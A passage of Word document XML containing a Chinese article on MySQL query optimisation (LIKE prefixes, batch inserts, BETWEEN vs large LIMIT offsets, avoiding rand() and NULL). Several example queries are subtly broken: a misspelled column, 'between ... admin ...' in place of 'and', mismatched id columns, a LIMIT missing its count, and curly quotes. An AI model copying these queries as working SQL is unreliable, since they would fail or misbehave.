          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> %% ,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>后面带</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>，双</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>是不走索引的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>原来语句：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> select * from admin where admin_name like ‘%de%'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>优化为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> select * from admin where admin_name &gt;='de' and admin_nam &lt;'df' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（注意不是等效的这里试试提供优化的思路）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>原则</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>、使用批量插入节省交互</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>（当如如果使用存储过程来处理批量的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">sql </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>各种逻辑是更好的选择）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>原来语句：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>insert into admin(admin_name,admin_password) values (‘test1′,'pass1′);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>insert into admin(admin_name,admin_password) values (‘test2′,'pass2′);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>insert into admin(admin_name,admin_password) values (‘test3′,'pass3′)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>优化为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> insert into admin(admin_name,admin_password) values(‘test1′,'pass1′),(‘test2′,'pass2′),(‘test3′,'pass3′)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>原则</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">limit </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>的基数比较大时使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>between</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>原来语句：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>select * from admin order by admin_id limit 100000,10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>优化为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  select * from admin where admin_id between 100000 admin 100010 order by admin_id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>原则</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>、不要使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>rand</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>函数获取多条随机记录。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>原来语句：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> select * from admin order by rand() limit 20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>优化为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> select * from admin as t1 Join(select round(rand()*((select max(admin_id) from admin)-(select min(id) from admin))+(select min(id) from admin)) as id) as t2 where t1.id&gt;=t2.id order by t1.id limit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>原则</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>、避免使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>原则</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>不要使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> count(id) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> count(*)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
